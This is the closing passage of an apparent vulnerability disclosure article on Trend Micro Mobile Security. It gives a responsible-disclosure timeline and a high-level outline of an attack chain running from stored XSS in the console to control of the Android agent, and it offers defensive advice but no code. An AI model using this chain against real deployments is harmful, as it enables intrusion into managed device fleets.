To keep the process transparent, here is the chronological arc from first commit to publication. Research started in January 2024 with reconnaissance and tooling. By April 2024, the vulnerabilities were validated and privately reported to Trend Micro with reproducible steps and artifacts. Triage and engineering review proceeded throughout the year; in February 2025, the work was added to Trend Micro’s public acknowledgments. A first talk on the research “Who Scans the Scanner?†was presented for BSides Las Vegas (August 2025) and OrangeCon (September 2025). This article accompanies the talk, with broader write-ups planned after vendor remediation windows are complete.
Conclusion
“Who scans the scanner?†stopped being a slogan and became a blueprint. In this work, we walked a complete chain (public report surface -> web-console code execution via stored XSS -> runtime control inside the Android agent) to show how a product that guards the fleet can also become the path into it. None of the steps relied on magic; they exploited design assumptions and trust boundaries that exist precisely because TMMS is allowed to see and do more than ordinary apps.
For APT operators, that combination is irresistible: a management plane that aggregates visibility, a console that administrators trust, and an agent that runs with privileged reach. Our lab demonstration stays true to that reality. We didn’t chase a one-off crash; we proved that normal operational flows (reporting and scanning) can be coerced into transport and control. That is the lesson to carry forward: in the supply chain of enterprise mobility, security tooling itself sits at a high-leverage junction and must be treated as Tier-0.
This isn’t vendor-bashing, it’s an argument for rigor. We disclosed responsibly, validated fixes where possible, and turned the findings into customer-side guidance: keep TMMS off the public internet, operate the console behind a strong identity, enforce managed distribution on devices, watch for the exact footprints this chain leaves, and rehearse the scenario as a purple-team exercise. Those are controls you can apply today, independent of any patch cadence.
The broader point is simple: trust is a target. Security products deserve the same adversarial testing we apply to identity providers, hypervisors, and domain controllers. If we treat scanners as Tier-0, verify their assumptions, and continuously instrument our environments to catch abuse of their workflows, we deny adversaries the leverage they seek.
So who scans the scanner? We do! researchers, red teams, blue teams, and the operators who run these platforms every day. Today, we mapped the seams in TMMS. Tomorrow, we use that map to harden our own environments and to keep pressure on the places where trust concentrates. Shields still crack; our job is to find the stress lines first and keep the defenses evolving.